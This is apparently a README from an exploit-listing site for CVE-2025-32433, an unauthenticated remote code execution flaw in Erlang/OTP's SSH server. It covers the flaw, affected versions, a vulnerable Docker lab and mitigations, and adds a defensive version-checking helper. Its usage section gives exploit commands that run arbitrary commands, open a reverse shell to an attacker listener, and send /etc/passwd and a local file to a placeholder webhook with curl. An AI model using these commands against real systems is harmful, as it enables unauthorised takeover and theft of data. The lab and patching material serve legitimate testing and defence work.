## https://sploitus.com/exploit?id=8454C6E2-D0E9-5367-BBEF-67FB44F73F8C
# CVE-2025-32433 - Critical Erlang/OTP SSH Vulnerability

![SSH ERLANG EXPLOIT](image.png)

## Overview 🔍

CVE-2025-32433 is a critical vulnerability in Erlang/OTP's SSH implementation that allows **unauthenticated remote code execution** via specially crafted SSH messages: an attacker who can reach the SSH port can execute arbitrary code on the affected system without ever authenticating.

* **What**: Remote Code Execution (RCE) via unauthenticated SSH messages in Erlang/OTP
* **Impact**: Full code execution, potentially as root, over the network
* **Affected**: Any system running an Erlang/OTP-based SSH server
* **Fix**: Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`
* **Workaround**: Restrict SSH access using firewall rules

## Vulnerability Details ⚠️

Discovered by researchers at Ruhr University Bochum, this vulnerability stems from improper handling of SSH connection protocol messages in Erlang/OTP: the server accepts and processes such messages before authentication has completed, so a maliciously crafted pre-authentication message results in arbitrary code execution.

If the Erlang SSH daemon is running as root (a common configuration), successful exploitation grants full system control, making it a prime candidate for ransomware deployment, lateral movement through networks, or data exfiltration.

## Affected Versions 🐛

* <= OTP-27.3.2
* <= OTP-26.2.5.10
* <= OTP-25.3.2.19

## Lab Setup 🖥️

Follow these steps to set up a test environment:

1. **Install Docker and Docker Compose**
   ```bash
   sudo apt update
   sudo apt install apt-transport-https ca-certificates curl gnupg lsb-release
   curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
   sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
   sudo apt install docker-ce docker-ce-cli containerd.io
   sudo docker --version
   sudo curl -L "https://github.com/docker/compose/releases/download/v2.29.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
   sudo chmod +x /usr/local/bin/docker-compose
   docker-compose --version
   ```

2. **Build and Run the Vulnerable Container**
   ```bash
   docker build -t erlang-ssh .
   docker run -d --name erlang-ssh-container -p 2222:2222 -v /home/local.txt:/home erlang-ssh
   ```
3. **Set Up as a Service**

   To run the container as a service that starts automatically:

   a. Create a systemd service file:
   ```bash
   sudo nano /etc/systemd/system/erlang-ssh-vuln.service
   ```
   b. Add the following content:
   ```ini
   [Unit]
   Description=Erlang SSH Vulnerability Lab
   After=docker.service
   Requires=docker.service

   [Service]
   TimeoutStartSec=0
   Restart=always
   ExecStartPre=-/usr/bin/docker stop erlang-ssh-container
   ExecStartPre=-/usr/bin/docker rm erlang-ssh-container
   ExecStart=/usr/bin/docker run --name erlang-ssh-container -p 2222:2222 -v /home/local.txt:/home erlang-ssh
   ExecStop=/usr/bin/docker stop erlang-ssh-container

   [Install]
   WantedBy=multi-user.target
   ```

   c. Enable and start the service:
   ```bash
   sudo systemctl daemon-reload
   sudo systemctl enable erlang-ssh-vuln.service
   sudo systemctl start erlang-ssh-vuln.service
   ```

## Exploit Usage 🚀

The exploit script provides several options for testing and exploiting the vulnerability:

### Basic Syntax:
```bash
python exploit.py <host> [options]
```

### Check Vulnerability:
```bash
python exploit.py 172.32.33.28 -p 2222 --check
```

### Execute Command:
```bash
python exploit.py 172.32.33.28 -p 2222 -c 'ls -la'
```

### Get Reverse Shell:
```bash
python exploit.py 172.32.33.28 -p 2222 --shell --lhost 172.32.36.48 --lport 4444
```

### Alternative Data Exfiltration:
If direct commands don't work, you can use webhook-based exfiltration:
```bash
python exploit.py 172.32.33.28 -p 2222 -c "curl -X POST -d @/etc/passwd WEBHOOKURL"
python exploit.py 172.32.33.28 -p 2222 -c "curl -X POST -d @/home/local.txt WEBHOOKURL"
```

## Mitigation Steps 🛡️

1. **Update Erlang/OTP**:
   - Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`
   - These patched versions properly validate SSH protocol messages

2. **Network Controls**:
   - Restrict access to SSH services with firewall rules
   - Implement network segmentation to isolate critical systems

3. **Monitoring**:
   - Deploy intrusion detection/prevention systems to monitor for exploitation attempts
   - Enable enhanced logging for SSH connections
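
To help with the "Update Erlang/OTP" step and the Affected Versions list above, here is an added helper (not part of this repository) that classifies an installed OTP release string against the affected and fixed versions stated in this README. It compares version components numerically rather than as strings, treats branches older than OTP-25 as inside the `<= OTP-25.3.2.19` bound, and, as an assumption, reports branches newer than 27 as not covered by the listed ranges.

```python
"""Classify an Erlang/OTP release against the CVE-2025-32433 version ranges."""
import re
import sys
from typing import Tuple

# First fixed release per branch, as listed in this README's mitigation step.
FIXED_MIN = {
    27: (27, 3, 3),
    26: (26, 2, 5, 11),
    25: (25, 3, 2, 20),
}

_VERSION_RE = re.compile(r"^(?:OTP-)?(\d+(?:\.\d+)*)$")


def parse_otp_version(text: str) -> Tuple[int, ...]:
    """Parse 'OTP-26.2.5.10' or '26.2.5.10' into a tuple of ints.

    Tuples compare component-wise, so 27.3.10 sorts after 27.3.9; a plain
    string comparison would get that wrong and misreport patched hosts.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not an OTP version string: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def cve_2025_32433_status(text: str) -> str:
    """Return 'affected', 'fixed' or 'not_listed' for an OTP version string."""
    version = parse_otp_version(text)
    major = version[0]
    if major in FIXED_MIN:
        # Anything below the first fixed release of the branch is affected
        # (<= 27.3.2, <= 26.2.5.10, <= 25.3.2.19 respectively).
        return "fixed" if version >= FIXED_MIN[major] else "affected"
    if major < 25:
        # Older than every listed bound, so inside "<= OTP-25.3.2.19".
        return "affected"
    # Assumption: branches newer than OTP-27 are not covered by the listed ranges.
    return "not_listed"


if __name__ == "__main__":
    # Usage: python otp_version_check.py OTP-27.3.2  (constructed sample)
    arg = sys.argv[1] if len(sys.argv) > 1 else "OTP-27.3.2"
    print(f"{arg}: {cve_2025_32433_status(arg)}")
```

The full version string, unlike `erlang:system_info(otp_release)` which only gives the major number, can be read from the `OTP_VERSION` file under the release's `releases/<major>/` directory of the installation.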